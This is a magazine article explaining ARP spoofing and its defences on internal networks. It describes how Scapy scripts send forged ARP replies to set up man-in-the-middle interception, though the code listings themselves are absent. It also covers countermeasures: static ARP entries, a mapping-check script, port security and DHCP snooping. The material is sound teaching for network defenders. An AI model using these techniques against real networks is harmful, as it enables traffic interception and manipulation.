ARP protocol attacks and defenses

Camouflage and Skullduggery

© Lead Image © Andre Zhak,

© Lead Image © Andre Zhak,

Article from Issue 181/2015
Author(s): , Author(s):

ARP spoofing can be used to initiate denial-of-service attacks, network hijacking, and man-in-the-middle attacks on the Intranet. We look at how to prevent these incursions.

Companies spend huge amounts of money to protect themselves from attacks on the Internet, but the security of the intranet it is not very advanced in most small to medium-sized enterprises. The credo is often: Internal users will not attack their own. The reality is rather different, which is reason enough to take a look at one of the most common attacks and defense options on internal networks: ARP Spoofing.

On the intranet, unlike the Internet, addressing is not based on Layer 3 (IP), but on Layer 2 (Ethernet). A packet identifies its target by reference to the MAC address. To ensure that resolution between IPv4 addresses and MAC addresses runs smoothly, ARP (Address Resolution Protocol) or its counterpart RARP (reverse ARP) are used.

If computer A wants to communicate with computer B, A sends an ARP request to the broadcast address to discover the MAC address of B. Computer B responds with an ARP reply. In a TCP dump, this kind of conversation looks like Listing 1.

Listing 1

Intranet Communication


The result of the query is stored in the ARP cache. The number of seconds until a new ARP request is sent is defined by Linux as the value in /proc/sys/net/ipv4/neigh/default/gc_stale_time. You can also set the value for each interface in /proc/sys/net/ipv4/neigh/eth0/gc_stale_time.

Attacks on ARP

The simplest attack at the ARP level relies on the attacker continuously sending ARP reply packets to computer A and setting their own MAC address as the IP address of computer B (Figure 1). If the attacker now sends an ARP reply to computer B, in which the attacker's MAC address for computer A is registered, the attacker now has a bidirectional man-in-the-middle connection. This attack is also referred to as network hijacking. Now the attacker can sniff and manipulate all the traffic between the two computers.

Figure 1: The attacker in the middle spoofs the MAC addresses of computers A and B.

This is not rocket science; in fact, it can easily be achieved with a short Python script (Listing 2) that uses the Scapy package builder. Scapy can be installed using the operating system's package manager or with the Python PIP tool:

pip install Scapy

Listing 2

ARP Attack with Scapy


As parameters, the script requires the two endpoints of the connection the attacker wants to compromise using this attack. An ARP response packet for each endpoint is generated in lines 15 and 16; it sets its own MAC address as the IP address of the opposite end. Scapy automatically adds the missing addresses. It sends two packets in the following loop (lines 18-21) and then waits for interval seconds before sending them again.

This kind of ARP attack is not very elegant and is easy to detect; after all, you are sending response packets for a request that has never been made. But, sometimes it is the only way for an attacker to spoof the connection using ARP. This is the case, for example, if the two hosts have a faster connection to one another than the attacker himself.

A superior variant of this attack sniffs the network traffic and waits for an ARP request, to which it responds in parallel to the host actually addressed with its own ARP response packet. In this case, the attacker hopes that their packet reaches the destination host faster than the response from the host in fact addressed. To do this, you can extend the script, as shown in Listing 3.

Listing 3

ARP Attack with Own Response Packet


Scapy will not only generate new network packets but also use the sniff() function to read the traffic and invoke a callback function for each imported packet. To avoid the need to analyze all the packets, the script sets the arp PCAP filter. This guarantees that only ARP packets are considered as parameters of the callback function. The function checks whether the packet is an ARP request, creates a response packet by reversing the source and target addresses, and sends the results on Layer 2 using sendp().

Defense Against ARP Attacks

Man-in-the-middle attacks via ARP are easiest to spot on the client, but network devices such as switches can also do this if the attack traffic is routed through them. As seen, an ARP request is sent within an internal network to discover the MAC address for an IPv4 address.

The attack relies on spoofing the reply to an ARP request so that the client enters the attacker's IP address, instead of the correct one, in its ARP cache. The easiest way to prevent this attack is not to use the ARP protocol to distribute MAC addresses at all. Instead, the MAC addresses of all devices of the network are entered statically.

On a Linux or Mac OS X system, you can create a permanent MAC address with the command:

arp -s 00:0c:29:c0:94:bf

On Windows, on the other hand, the command looks like this:

arp -s 00-0c-23-c0-94-bf

In OpenBSD, you need to add the permanent parameter because, otherwise, only an overridable static entry is created.

arp -s 00:0c:29:c0:94:bf permanent

To try to minimize the administrative overhead – and assuming that the network is too large and flexible to implement a static MAC address easily – there are still ways at least to detect this type of attack.

To begin, I'll take a closer look at the client. Normally, an attacker will not be on the network when the client logs on for the first time. The client thus first learns with a high degree of probability the correct MAC address of the computer with which it wants to communicate. On most networks, the MAC/IP address mappings rarely change. You can thus write a script that checks whether this mapping has changed (Listing 4).

Listing 4

Checking the MAC/IP Address Mappings


The attack is not only detected, but also prevented. The price is the difficulty in assigning a new MAC address to an IP, because the old mapping needs to be deleted on the client side before this can happen. One way to achieve more flexibility is the use of configuration management tools like Puppet, which can be used directly either to assign new or delete old static MAC entries from the /etc/ethers file.

Today, many network devices offer the option of learning and checking MAC addresses statically or dynamically. The relevant techniques here include port security, DHCP snooping, private VLANs, AID, and implementation of the 802.1x standard.


It is not very difficult to protect yourself against the described attack. As an administrator, you can either rely on a combination of static ARP and a configuration management tool, or a feature of the switches that you deploy. ARP was standardized in 1982, when networks still only seemed to consist of friendly computers. Anyone who uses ARP should be aware that this is not a secure protocol and that appropriate precautions must be taken.

Buy this article as PDF

Express-Checkout as PDF
Price $2.95
(incl. VAT)

Buy Linux Magazine

Get it on Google Play

US / Canada

Get it on Google Play

UK / Australia

Related content

  • Core Technologies

    Learn what's going on in your network, using Linux and its arsenal of packet capture tools.

  • ARP Spoofing

    Any user on a LAN can sniff and manipulate local traffic. ARP spoofing and poisoning techniques give an attacker an easy way in.

  • Command Line: Network Diagnostic Tools

    Linux has the right tools to track down network errors and open the way for data packets.

  • Bridgewall

    Firewalls are typically implemented as routers,but it doesn’t have to be that way. Bridging packet filters have a number of advantages,and you can add them to your network at a later stage without changing the configuration of your network components.

  • Netfilter's Recent Module

    Netfilter’s Recent module builds a temporary blacklist to keep intruders off your network.

comments powered by Disqus

Direct Download

Read full article as PDF:

Price $2.95